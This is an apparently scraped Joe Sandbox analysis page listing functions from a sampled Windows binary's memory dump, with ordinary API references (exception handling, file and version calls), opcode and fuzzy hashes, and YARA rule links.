Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FullNamePath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1693479884-0
Opcode ID: 98847fc0a0a84781d4ba02383bfb3443521a2b3df3f50960c1a44faee8b43a12
Instruction ID: 345c48a5dc01cba809912d4c1219fac46af783dd62b10789e5c17c3e0cb60c74
Opcode Fuzzy Hash: 98847fc0a0a84781d4ba02383bfb3443521a2b3df3f50960c1a44faee8b43a12
Instruction Fuzzy Hash: 21A1D362F14B5294FF00AB79C8845BDA361AF49BE4BA44235DE1D17FC9DEBCE441D210

Function 00007FF731CA30F0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF731CA310C
RtlCaptureContext.KERNEL32 ref: 00007FF731CA3139
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF731CA3153
RtlVirtualUnwind.KERNEL32 ref: 00007FF731CA3194
IsDebuggerPresent.KERNEL32 ref: 00007FF731CA31E8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF731CA3209
UnhandledExceptionFilter.KERNEL32 ref: 00007FF731CA3214

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
Instruction ID: edf52cb6acd81b9d4bd34d48758eaff407084a5388978099dd04dd2d3a295eff
Opcode Fuzzy Hash: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
Instruction Fuzzy Hash: 46315E72A09B8199EB60EF60E8503EDB360FB84B44F944439DB4E47A98DF7CD548D720

Function 00007FF731CA7658 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF731CA76D1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF731CA76E9
RtlVirtualUnwind.KERNEL32 ref: 00007FF731CA7724
IsDebuggerPresent.KERNEL32 ref: 00007FF731CA775D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF731CA7767
UnhandledExceptionFilter.KERNEL32 ref: 00007FF731CA7772

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
Instruction ID: d3d81905b7ffa7872f65786c907fc006b6bcaf73589bba125f04abcbe0e0f73f
Opcode Fuzzy Hash: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
Instruction Fuzzy Hash: CD31A436A08B81A5D721DF25E8403AEB3A0FB88B54FA40535EE9D43B98DF7CC545CB10

Function 00007FF731C71AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C71EA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C71EAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C71EB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C71EBB

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: e4f76085d4319caec31d13061860d09f6c594104b8d6fbbba7e66862e16aba8c
Instruction ID: 42920fd6e357c39ba5bd4c9a168ef8af081edaa39230ace27cd103dd5879a47e
Opcode Fuzzy Hash: e4f76085d4319caec31d13061860d09f6c594104b8d6fbbba7e66862e16aba8c
Instruction Fuzzy Hash: 03B1D162F14782AAEB10BF65D8442EDA361FB89794FA05631EA4C07BD9DFBCE540D310

Function 00007FF731CAFA14 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CAFA44

Part of subcall function 00007FF731CA78B4: GetCurrentProcess.KERNEL32(00007FF731CB0C4D), ref: 00007FF731CA78E1

Strings

*?, xrefs: 00007FF731CAFA6B
., xrefs: 00007FF731CAFE64

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction ID: e6b782c029dd3ee2b6ddac360eb03a8f2194bc38f52e6c3a52b3ac465301c310
Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction Fuzzy Hash: 1F510562F14B9591FB12EFA298110FCA7A4FF44BD8BA48931DE1D17B85DEBCD4429320

Function 00007FF731CB2000 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF731CB208B

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction ID: dfa5de050e085192e565165cd343d975d42577e3ea5f3776363eed701d3a5ffe
Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction Fuzzy Hash: AAD1CF32B1928697DB34DF15E1846AAB7A1FB88784FA48134DB4E97B44CA3CF841DB40

Function 00007FF731C7B6E8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF731C7BAAD), ref: 00007FF731C7B6F5
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF731C7BAAD), ref: 00007FF731C7B729
LocalFree.KERNEL32(?,?,?,?,?,?,?,00007FF731C7BAAD), ref: 00007FF731C7B753

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: a3eefe559d296bd36c1cae37cf4e1e300267d0d32691df0dd3a6d40942d78c6b
Instruction ID: 9fdff02cdad9e60e1dac8a8259342ef65ff211a667abe7c4f0799d0327c61ef3
Opcode Fuzzy Hash: a3eefe559d296bd36c1cae37cf4e1e300267d0d32691df0dd3a6d40942d78c6b
Instruction Fuzzy Hash: 64016271F0C74296E710AF22B89067AE391FB89BC0F984034EA4E87B45CFBCE5049720

Function 00007FF731CAFC20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF731CAFE64

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 2fd9fb95ed6a4284651077151a4f0b6093c6589f12268630e25181bc308688a6
Instruction ID: eb2118c3a1cf32cdfceb6d972bc14c9c8246ce64ff2db52b239f1b1c3c7a4756
Opcode Fuzzy Hash: 2fd9fb95ed6a4284651077151a4f0b6093c6589f12268630e25181bc308688a6
Instruction Fuzzy Hash: D231E922F0469165F721AF32A8057A9FB91AF44FE4F648635DE6C47BC5CE7CD5019300

Function 00007FF731CB5A78 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF731CB5CC5
RaiseException.KERNEL32 ref: 00007FF731CB5CD6

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: dd850569bf3cdd24e5cff22b07788c07adbe1485687e236f21ba57eb0d1323aa
Instruction ID: d1603e3eca47b9aa72feb7c577ddf9743c6092d67b05e129a710d1d9e73207a7
Opcode Fuzzy Hash: dd850569bf3cdd24e5cff22b07788c07adbe1485687e236f21ba57eb0d1323aa
Instruction Fuzzy Hash: FFB18D73A00B858BEB15DF29C84636C7BA0F744B48F68C921DB5D83BA9CB79D852D710

Function 00007FF731C98D74 Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C98560: GetDC.USER32 ref: 00007FF731C9856C
Part of subcall function 00007FF731C98560: GetDeviceCaps.GDI32 ref: 00007FF731C9857D
Part of subcall function 00007FF731C98560: ReleaseDC.USER32 ref: 00007FF731C9858A

GetObjectW.GDI32 ref: 00007FF731C98DC8

Part of subcall function 00007FF731C99030: GetDC.USER32 ref: 00007FF731C99059
Part of subcall function 00007FF731C99030: GetObjectW.GDI32 ref: 00007FF731C99087
Part of subcall function 00007FF731C99030: ReleaseDC.USER32 ref: 00007FF731C9913B

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID:
API String ID: 1061551593-0
Opcode ID: 889094c01c96e48fc0bc8d6bac5bcd56f2ce6fd0cf7844abad017e09edda8be2
Instruction ID: 262dfd257b9def2638bf4ed9fba6749f0d374cda5317835190bf00b8747e4916
Opcode Fuzzy Hash: 889094c01c96e48fc0bc8d6bac5bcd56f2ce6fd0cf7844abad017e09edda8be2
Instruction Fuzzy Hash: 56813C36F08A0596EB20EF6AE4406ADB771FB88B88F604132DE0D57B28DF78D549D750

Function 00007FF731C9A24C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF731C9A295
GetNumberFormatW.KERNEL32 ref: 00007FF731C9A2F1

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
Instruction ID: 67909833aae6173b61728f6e1b14c964a6dd5c87b5687ece5bf978c771369de1
Opcode Fuzzy Hash: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
Instruction Fuzzy Hash: 45119D32E18B81A6E7619F51E8503E9B360FF88B84FD44135DA8C03A18DF7CE546D715

Function 00007FF731C81224 Relevance: 1.7, APIs: 1, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C82480: CreateFileW.KERNELBASE ref: 00007FF731C8255B
Part of subcall function 00007FF731C82480: GetLastError.KERNEL32 ref: 00007FF731C8256E
Part of subcall function 00007FF731C82480: CreateFileW.KERNEL32 ref: 00007FF731C825CE
Part of subcall function 00007FF731C82480: GetLastError.KERNEL32 ref: 00007FF731C825D7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81588

Part of subcall function 00007FF731C83940: MoveFileW.KERNEL32 ref: 00007FF731C8397D
Part of subcall function 00007FF731C83940: MoveFileW.KERNEL32 ref: 00007FF731C839F4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 34527147-0
Opcode ID: 3e3c2dafde13bc4bf056ca35c277eb15c59170820108c03311a083a9e71950fe
Instruction ID: 159513904861439d30167e84cdc86d6743d9f7ccb0f43a9e8d6575ea56bd0ab8
Opcode Fuzzy Hash: 3e3c2dafde13bc4bf056ca35c277eb15c59170820108c03311a083a9e71950fe
Instruction Fuzzy Hash: 0E91D422F18642A6EB10EB66D4842BDA3A1FB94BC4FA44032EE0D57F95DFBCD545D320

Function 00007FF731C85164 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF731C85195

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 28938a17eae63f527378ec6d8089add22f73b828584f204ae18651ef0e591bdf
Instruction ID: 0bf34fbc7fd3b516ad6a22326d88a6b2a91f286ee443ac2093878a70c1b44eec
Opcode Fuzzy Hash: 28938a17eae63f527378ec6d8089add22f73b828584f204ae18651ef0e591bdf
Instruction Fuzzy Hash: 09012972E08682ABF724AB04E840779B7A0BB88354FE00234D55D42B90DFBCE801AF20

Function 00007FF731CA8B9C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF731CA8D53

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 0bdc5fc199a0cdb7e5e4fe1bb73b5790fb45139705c0e0a4982304375264cdf5
Instruction ID: 644562870505f288033756e392d29a261f304238ec3b302238a09e3fc84cf0b1
Opcode Fuzzy Hash: 0bdc5fc199a0cdb7e5e4fe1bb73b5790fb45139705c0e0a4982304375264cdf5
Instruction Fuzzy Hash: CC813621E1960367EBA6BA25904067DE3A0FF00B49FF41D31DD0997795CFADE802EB61

Function 00007FF731CA8920 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF731CA8ABA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction ID: b2838bacf671665635a15d26f24df37d9e71006675d72c3e0a037d58ac9f100a
Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction Fuzzy Hash: DF716821F0C28267FB6AAA24405227EE790FF41745FB81D31CD08876D5CEADEC46B361

Function 00007FF731C8C928 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

gj, xrefs: 00007FF731C8C937

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 8e61a0345426cfbf98e966bfd6dd27ed2445dff38cff5604a39dc23a55b332d0
Instruction ID: d75b7b76b8205979cf09056036a3a5721bab13d7b41e8967cb50ef6b89812741
Opcode Fuzzy Hash: 8e61a0345426cfbf98e966bfd6dd27ed2445dff38cff5604a39dc23a55b332d0
Instruction Fuzzy Hash: EF519037B286909BD724CF25E400A9EB3A5F388798F555126EF4A93F08CB39E945CF40

Function 00007FF731CAC7B8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF731CAC7F4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c44f08b774434d1c2136fe748e04a0077f53503c1e88ff3ce48f42e5bcad7e07
Instruction ID: 58bed381a613aa575b32d50bd15305b4de4fbd0af175b97901ce56c25db517b5
Opcode Fuzzy Hash: c44f08b774434d1c2136fe748e04a0077f53503c1e88ff3ce48f42e5bcad7e07
Instruction Fuzzy Hash: 4D41C023B14A4486EF04DF2AD8142A9B3A1B758FD4B9DA036DE0D8B754DE7CD446D300

Function 00007FF731CB0CA0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF731CB0CA4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

